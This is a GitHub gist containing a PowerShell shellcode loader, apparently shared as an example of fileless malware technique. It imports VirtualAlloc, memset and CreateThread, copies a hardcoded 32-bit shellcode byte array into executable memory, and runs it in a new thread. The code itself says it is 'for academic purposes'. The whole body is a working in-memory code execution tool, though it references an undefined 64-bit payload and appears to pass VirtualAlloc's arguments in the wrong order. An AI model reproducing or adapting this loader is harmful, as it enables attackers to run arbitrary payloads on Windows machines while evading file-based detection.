Last active
March 25, 2022 02:09
-
-
Save adelmas/08e37c3ebeb5a98e78fc02c51176e93e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Powershell Code Execution 'Exploit' | |
| Author: Matthew Graeber | |
| Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions. | |
| #> | |
| # Import required functions | |
| $code = @" | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| [DllImport("msvcrt.dll")] | |
| public static extern IntPtr memset(IntPtr dest, uint src, uint count); | |
| "@ | |
| # Add CSharp code as a class recognized by Powershell | |
| $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru | |
| # Copy and paste your shellcode here in the form 0xXX. | |
| # 32-bit payload | |
| # Locates and calls LoadLibrary('1.dll') | |
| [Byte[]]$sc32 = 0x60, 0x83, 0xC4, 0xC0, 0xFC, 0x31, 0xD2, 0x64, 0x8B, 0x52, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0xB9, 0x18, 0x00, 0x00, 0x00, 0x31, 0xFF, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF0, 0x81, 0xFF, 0x5B, 0xBC, 0x4A, 0x6A, 0x8B, 0x5A, 0x10, 0x89, 0x5D, 0xFC, 0x8B, 0x12, 0x75, 0xD6, 0x8B, 0x4B, 0x3C, 0x01, 0xD9, 0x83, 0xC1, 0x18, 0x83, 0xC1, 0x60, 0x89, 0x4D, 0xF8, 0x8B, 0x09, 0x01, 0xD9, 0x51, 0x83, 0xC1, 0x24, 0x8B, 0x09, 0x01, 0xD9, 0x89, 0x4D, 0xF4, 0x59, 0x51, 0x83, 0xC1, 0x1C, 0x8B, 0x09, 0x01, 0xD9, 0x89, 0x4D, 0xF0, 0x59, 0x83, 0xC1, 0x20, 0x8B, 0x09, 0x01, 0xD9, 0x8B, 0x11, 0x01, 0xDA, 0x89, 0xD6, 0x51, 0xB9, 0x18, 0x00, 0x00, 0x00, 0x31, 0xFF, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF0, 0x81, 0xFF, 0xBA, 0x18, 0x7B, 0x11, 0x59, 0x74, 0x15, 0x83, 0xC1, 0x04, 0x8B, 0x11, 0x03, 0x55, 0xFC, 0x89, 0xD6, 0x8B, 0x55, 0xF4, 0x83, 0xC2, 0x02, 0x89, 0x55, 0xF4, 0xEB, 0xCA, 0x8B, 0x55, 0xF0, 0x03, 0x55, 0xFC, 0x31, 0xC0, 0x8B, 0x4D, 0xF4, 0x66, 0x8B, 0x01, 0xBA, 0x04, 0x00, 0x00, 0x00, 0xF7, 0xE2, 0x8B, 0x55, 0xF0, 0x01, 0xC2, 0x8B, 0x12, 0x03, 0x55, 0xFC, 0xC6, 0x45, 0xE3, 0x00, 0xC6, 0x45, 0xE2, 0x6C, 0xC6, 0x45, 0xE1, 0x6C, 0xC6, 0x45, 0xE0, 0x64, 0xC6, 0x45, 0xDF, 0x2E, 0xC6, 0x45, 0xDE, 0x31, 0x8D, 0x45, 0xDE, 0x50, 0xFF, 0xD2, 0x61 | |
| [Byte[]]$sc = $sc32 | |
| if ([IntPtr]::Size -eq 8) {$sc = $sc64} | |
| # Calculate correct size param for VirtualAlloc | |
| $size = 0x1000 | |
| if ($sc.Length -gt 0x1000) {$size = $sc.Length} | |
| # Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000. | |
| # Allocate RWX memory block | |
| $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) | |
| # I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid). | |
| for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} | |
| # Execute you payload | |
| $winFunc::CreateThread(0,0,$x,0,0,0) | |
| sleep(10); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
http://adelmas.com/blog/fileless_malwares.php